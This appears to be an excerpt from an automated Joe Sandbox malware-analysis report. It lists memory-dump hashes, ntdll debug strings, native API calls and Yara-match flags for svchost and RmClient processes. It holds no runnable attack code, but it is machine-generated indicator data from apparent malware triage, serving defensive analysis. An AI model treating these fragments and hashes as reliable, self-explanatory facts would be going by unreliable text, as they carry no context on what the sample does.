                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9beeb3a637d7e1e2757340911299b9da0a37609cc836ce79b00695df2a08aa9e
                                                                                                                      • Instruction ID: 227e2f07adcecb058d485ec00e29abd6841de12725c4a87cf210b5026c6d31fc
                                                                                                                      • Opcode Fuzzy Hash: 9beeb3a637d7e1e2757340911299b9da0a37609cc836ce79b00695df2a08aa9e
                                                                                                                      • Instruction Fuzzy Hash: 6090023120240C02E104B25888446C6004687D0301F95C011A6424659E976589917131
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fab693e33a595e6f9a93738cbed6d909b737bc8dc3323eaba215097a2c04f2e4
                                                                                                                      • Instruction ID: ce895da96dbeacc49fe7a3c7f0bac4081e15daec10a300372ab21e5252573c09
                                                                                                                      • Opcode Fuzzy Hash: fab693e33a595e6f9a93738cbed6d909b737bc8dc3323eaba215097a2c04f2e4
                                                                                                                      • Instruction Fuzzy Hash: 4790023160640C02E150B2588454786004687D0301F95C011A0424658D87558B5576A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0ce42a06625f11c05117fce9047302c0c86125f4c55c9570ab75b2d8a553bcdc
                                                                                                                      • Instruction ID: 255c6646a32e1e43b1bb9576642367f3a175ad6cd3d5e5a7799d590c98329b94
                                                                                                                      • Opcode Fuzzy Hash: 0ce42a06625f11c05117fce9047302c0c86125f4c55c9570ab75b2d8a553bcdc
                                                                                                                      • Instruction Fuzzy Hash: A290023120644C42E140B2588444A86005687D0305F95C011A0464698D97258E55B661
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d2ecd73aa1907b577acb52217f195f2fd39b1b1382e17cea329659f9e51632c7
                                                                                                                      • Instruction ID: 3c6f16fb4803e66306a919d02b0ed0964663dd0b229da0ff1e2f2945a35aba23
                                                                                                                      • Opcode Fuzzy Hash: d2ecd73aa1907b577acb52217f195f2fd39b1b1382e17cea329659f9e51632c7
                                                                                                                      • Instruction Fuzzy Hash: F390023120240C02E180B258844468A004687D1301FD5C015A0425658DCB158B5977A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e7ee507783092ba30be6069646c793fb114ad41006c3fffcf7a0911945683dbe
                                                                                                                      • Instruction ID: 78b4e79fd1b16aa4bb57255434fa8ce5aefa62395f07a379fa2cd7aea63590db
                                                                                                                      • Opcode Fuzzy Hash: e7ee507783092ba30be6069646c793fb114ad41006c3fffcf7a0911945683dbe
                                                                                                                      • Instruction Fuzzy Hash: 3D90023120340542A540B3589844A8E414687E1302BD5D415A0415558CCA1489615221
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6eced130dffc702fe6f3e77ff98dc75140229b264900807e194e1423ea3c7460
                                                                                                                      • Instruction ID: c6734bda95344e59599846dbd64c33f696c4fd329d6da1672c993ea8dd9f6e79
                                                                                                                      • Opcode Fuzzy Hash: 6eced130dffc702fe6f3e77ff98dc75140229b264900807e194e1423ea3c7460
                                                                                                                      • Instruction Fuzzy Hash: BF90022130240403E140B25894586464046D7E1301F95D011E0814558CDA1589565222
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 52b3526746390bf4d0e5d58bf27eba5de1f4f22a6abbd35f28c875f5b8991d77
                                                                                                                      • Instruction ID: 7d5c2ee8df3fd87a442fced2f2bf09b1ffe7fe3f6b6e38da27442eb94cb4f563
                                                                                                                      • Opcode Fuzzy Hash: 52b3526746390bf4d0e5d58bf27eba5de1f4f22a6abbd35f28c875f5b8991d77
                                                                                                                      • Instruction Fuzzy Hash: 6490023520240802E510B2589844686008787D0301F95D411A082455CD875489A1A121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 668ef1cf4b401e0d3d8e12bb3cf605d23c2aec6012e464b8fe41d16ef49f2796
                                                                                                                      • Instruction ID: d9e062dcc6b90e0d271e18a4c10fad491bbdf1ecf487d0e8e18833c814d1d5b6
                                                                                                                      • Opcode Fuzzy Hash: 668ef1cf4b401e0d3d8e12bb3cf605d23c2aec6012e464b8fe41d16ef49f2796
                                                                                                                      • Instruction Fuzzy Hash: 6E90023124240802E141B2588444646004A97D0341FD5C012A0824558E87558B56AA61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c52917ffc51e59714fb4af53e2fa364a478908248d0a18dff09608e6ada1b66e
                                                                                                                      • Instruction ID: b4de34f3f80a891febf8bb8f0285f8965509446860203a28027176e33da0a03d
                                                                                                                      • Opcode Fuzzy Hash: c52917ffc51e59714fb4af53e2fa364a478908248d0a18dff09608e6ada1b66e
                                                                                                                      • Instruction Fuzzy Hash: 86900221243445526545F2588444547404797E03417D5C012A1814954C86269956D621
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4760b6e73a80a4d2383849cfdc01fa10067def3114f633e339cc56359abd7e35
                                                                                                                      • Instruction ID: c975f90432bedbf3e330998a409d7d30fdae0cf2c907d4e67e36df3829efe30c
                                                                                                                      • Opcode Fuzzy Hash: 4760b6e73a80a4d2383849cfdc01fa10067def3114f633e339cc56359abd7e35
                                                                                                                      • Instruction Fuzzy Hash: 6190023120240C42E100B2588444B86004687E0301F95C016A0524658D8715C9517521
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 61f04b5bef9c70e658d54790893ffe949106e2065d6732cb5994ddc058554ba5
                                                                                                                      • Instruction ID: 91c583f3f708e6fbe1ad4dc74aee16e99e956f0a51ee552c465b15ef6b06fa83
                                                                                                                      • Opcode Fuzzy Hash: 61f04b5bef9c70e658d54790893ffe949106e2065d6732cb5994ddc058554ba5
                                                                                                                      • Instruction Fuzzy Hash: 2F90023120240802E100B6989448686004687E0301F95D011A5424559EC76589916131
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bdbcd088faca9f3c05814db7a46bf6bf29a746507b89a9c3545c636118321c7b
                                                                                                                      • Instruction ID: 6efa049e2cd7bab178828c8ec39d47d2b40bb7367f216bd2368c40e8e80b6f1e
                                                                                                                      • Opcode Fuzzy Hash: bdbcd088faca9f3c05814db7a46bf6bf29a746507b89a9c3545c636118321c7b
                                                                                                                      • Instruction Fuzzy Hash: CF90022160640802E140B2589458746005687D0301F95D011A0424558DC7598B5566A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d7bfd1d67c067e527357ab28a65b56ba167ca38312b873b8411bd24fa1830154
                                                                                                                      • Instruction ID: 0ce7ff1fb4659e164e958a89da5dfcfd2d098133f1c4fb30ba6b3343c487472b
                                                                                                                      • Opcode Fuzzy Hash: d7bfd1d67c067e527357ab28a65b56ba167ca38312b873b8411bd24fa1830154
                                                                                                                      • Instruction Fuzzy Hash: F190023120240803E100B2589548747004687D0301F95D411A082455CDD75689516121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction ID: aa0057e010792f307a6ad3e6794302dc3919de950015b0dfa45c354223d9da06
                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: 7571d4bde9114c4bfa716bc39e82b9ad540c0fad8759619d06ce9268a5617136
                                                                                                                      • Instruction ID: 3dd43c5e8df5d4a541ff5e8d49eaa179178be37ac947891ec34abaa15eb6841b
                                                                                                                      • Opcode Fuzzy Hash: 7571d4bde9114c4bfa716bc39e82b9ad540c0fad8759619d06ce9268a5617136
                                                                                                                      • Instruction Fuzzy Hash: 8851E9B5F02556BFCB60DBAC889057EF7FCBB48200B188569E4A5D7681D234DE40CBA4
                                                                                                                      Strings
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030A4725
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030A4742
                                                                                                                      • ExecuteOptions, xrefs: 030A46A0
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030A4655
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030A46FC
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 030A4787
                                                                                                                      • Execute=1, xrefs: 030A4713
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: c965e57698fedb32bb65b30a8b9c00417ad74d81fea22995a627e93a9b9e56e0
                                                                                                                      • Instruction ID: 78dcd32c70aaf640c9cab70d964d0d71dc444305b0533e176ea2e15831aeb794
                                                                                                                      • Opcode Fuzzy Hash: c965e57698fedb32bb65b30a8b9c00417ad74d81fea22995a627e93a9b9e56e0
                                                                                                                      • Instruction Fuzzy Hash: 16511B35A023197ADF25EBA9EC45FEE73B8EF44704F0404A9E505AB191D7B09A41CF51
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: f5ceeaa8e5a1b03da3c5f7c22b5059c6b783afc11a4e2b0d857a0c3f76189cf8
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 4081AE70E072499FDF64CE68C8917FEBBF5AF45310F1C865AD861AB390C6349941CB58
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 030A031E
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030A02E7
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030A02BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: aa5b3dd0ed81022b3e495cd044bdbb230278ef5cfef707194830906af20f7347
                                                                                                                      • Instruction ID: 2db8c7809eccb387bbab7755e55e440a5e1c3268c69996faf324d820e075a062
                                                                                                                      • Opcode Fuzzy Hash: aa5b3dd0ed81022b3e495cd044bdbb230278ef5cfef707194830906af20f7347
                                                                                                                      • Instruction Fuzzy Hash: 7BE1CD35606B46DFD764CF28C884B6BB7E4BB88314F184A6DF8A58B2D0D778D844CB42
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 030A7BAC
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 030A7B7F
                                                                                                                      • RTL: Resource at %p, xrefs: 030A7B8E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: 1bd38d0dfefade9024388b76cb4247a7291fe0d779d0a202cee1180e11bde72e
                                                                                                                      • Instruction ID: 5c68524538c811c45ac33e6c267ec5267953106bd79f41ab44d2f7c244cb31fb
                                                                                                                      • Opcode Fuzzy Hash: 1bd38d0dfefade9024388b76cb4247a7291fe0d779d0a202cee1180e11bde72e
                                                                                                                      • Instruction Fuzzy Hash: DD4126757027029FC724DF6ACC40B6AB7E9EF88710F044A2DF85ADB290DB71E4058B91
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030A728C
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 030A72C1
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 030A7294
                                                                                                                      • RTL: Resource at %p, xrefs: 030A72A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: ed38c1ad9db818f2e3b0b3d77d36f88683240072877618fcb95b8c8b661dcc27
                                                                                                                      • Instruction ID: 1a106c665ac3f352fff669199b654399dcfb32c0e85686191612411cfb348299
                                                                                                                      • Opcode Fuzzy Hash: ed38c1ad9db818f2e3b0b3d77d36f88683240072877618fcb95b8c8b661dcc27
                                                                                                                      • Instruction Fuzzy Hash: 6041F275702706ABC720DEA9CC41BAAB7E5FF84B10F148A29F855EB640DB21E81287D1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: abd2e0749aab9e49970beb63c65aea8394311e1fb8954c30f016bce8e0254830
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: 3691D670E0220A9BDF64DF69C9857BEB7F5FF44BA0F18851AE865E72C0D73089418768
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: eb1fcc16ae508bd7c970d6c938cc0dc52c47e1f6cfdc15088a9195b025f5fd8f
                                                                                                                      • Instruction ID: f95edb3e29bdc727553f147ea92e2464b4e180261d036fb99a993f21c44497c0
                                                                                                                      • Opcode Fuzzy Hash: eb1fcc16ae508bd7c970d6c938cc0dc52c47e1f6cfdc15088a9195b025f5fd8f
                                                                                                                      • Instruction Fuzzy Hash: 14813876D01269EBDB35DF54CC44BEEB7B8AB48710F0445EAA919B7280D7709E80CFA0

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                      Signature Coverage:2.2%
                                                                                                                      Total number of Nodes:447
                                                                                                                      Total number of Limit Nodes:72

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $"|$%s$)$*$+o$0T$4<$6$=$E$M$PH$R$W.$XV$b_$c/$j$k$oC$u$y$}$B$}
                                                                                                                      • API String ID: 0-2301151960
                                                                                                                      • Opcode ID: f2bce0f3554e2d894f9bf6843d7e4600a6ea4a7866b9fe11626fd644518aeb3b
                                                                                                                      • Instruction ID: 90d481c3c8dfc79d0bf558ae04dacf189acc2a1a15a567be73c1c49c31decbf4
                                                                                                                      • Opcode Fuzzy Hash: f2bce0f3554e2d894f9bf6843d7e4600a6ea4a7866b9fe11626fd644518aeb3b
                                                                                                                      • Instruction Fuzzy Hash: 634279B0905269CBEB64CF44D998BDDBBB2BF45308F2086D9C40D6B281CBB55AC9CF45
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0053C364
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0053C39F
                                                                                                                      • FindClose.KERNELBASE(?), ref: 0053C3AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: 5c2b0dcf3e29572057246500a1894db414adfab38c359f58219b6f5fecd4d6ea
                                                                                                                      • Instruction ID: 3176be929c9fdf627b5b3e192a8ad910cf6e07b280d82e4d358be70303b05cdf
                                                                                                                      • Opcode Fuzzy Hash: 5c2b0dcf3e29572057246500a1894db414adfab38c359f58219b6f5fecd4d6ea
                                                                                                                      • Instruction Fuzzy Hash: 69317275900709BBDB20DB64CC89FFF7B7CAF85744F144458B908A7181EA70AA84CBA4
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(7555528C,?,?,?,?,?,?,?,?,?,?), ref: 00548E7B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 9b61a9231aa61c4d26af5e12ff28be539a9e08509a6be0c3b0ba6cbb6713469e
                                                                                                                      • Instruction ID: fc6202a3ad7c03b4dd9306c71fc92370f969f15483e149414d2cb3c02e5f6248
                                                                                                                      • Opcode Fuzzy Hash: 9b61a9231aa61c4d26af5e12ff28be539a9e08509a6be0c3b0ba6cbb6713469e
                                                                                                                      • Instruction Fuzzy Hash: 7E31E6B5A01609AFDB14DF98D885EEFBBB9AF8C314F108119F918A3340D730A951CBA5
                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(7555528C,?,?,?,?,?,?,?,?), ref: 00548FD6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: d6fc3388c491b47a07547dac03d3507cf603be5bfe5fad50a33c618003d1c053
                                                                                                                      • Instruction ID: c4043b6b8d683020b66bcc9d5dc5679f97cb4ff66c222bd8fe75e347e3ce9dd1
                                                                                                                      • Opcode Fuzzy Hash: d6fc3388c491b47a07547dac03d3507cf603be5bfe5fad50a33c618003d1c053
                                                                                                                      • Instruction Fuzzy Hash: 243107B5A00609AFDB04DF98D885EEFBBF9AF8C314F008109F918A7341D770A910CBA5
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(7555528C,?,00547C9F,00000000,00000004,00003000,?,?,?,?,?,00547C9F,00531A0E,00547C9F,00000000), ref: 005492A5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: 017068d2e2586fda7af7b5b9bcd7d51c8a5596ad40ae70a7fd60c83975473353
                                                                                                                      • Instruction ID: af901c6c22b72c0e124da3d73bed2bfe33ec313c9b2e8ef5839de4f3b5377f9d
                                                                                                                      • Opcode Fuzzy Hash: 017068d2e2586fda7af7b5b9bcd7d51c8a5596ad40ae70a7fd60c83975473353
                                                                                                                      • Instruction Fuzzy Hash: A4213CB5A00609AFDB10DF98D885EEF7BB9EF88714F108109FD18A7241D770A910CBA5
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005490B7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 25d4ae8e20885b246a0b33a202f6818839664ef0674a9c243f9a03256c03aea3
                                                                                                                      • Instruction ID: 581fb89445f9db6d4ef24e0ca2dc281ef5cdeba87e830d1edc3c955d8915c88c
                                                                                                                      • Opcode Fuzzy Hash: 25d4ae8e20885b246a0b33a202f6818839664ef0674a9c243f9a03256c03aea3
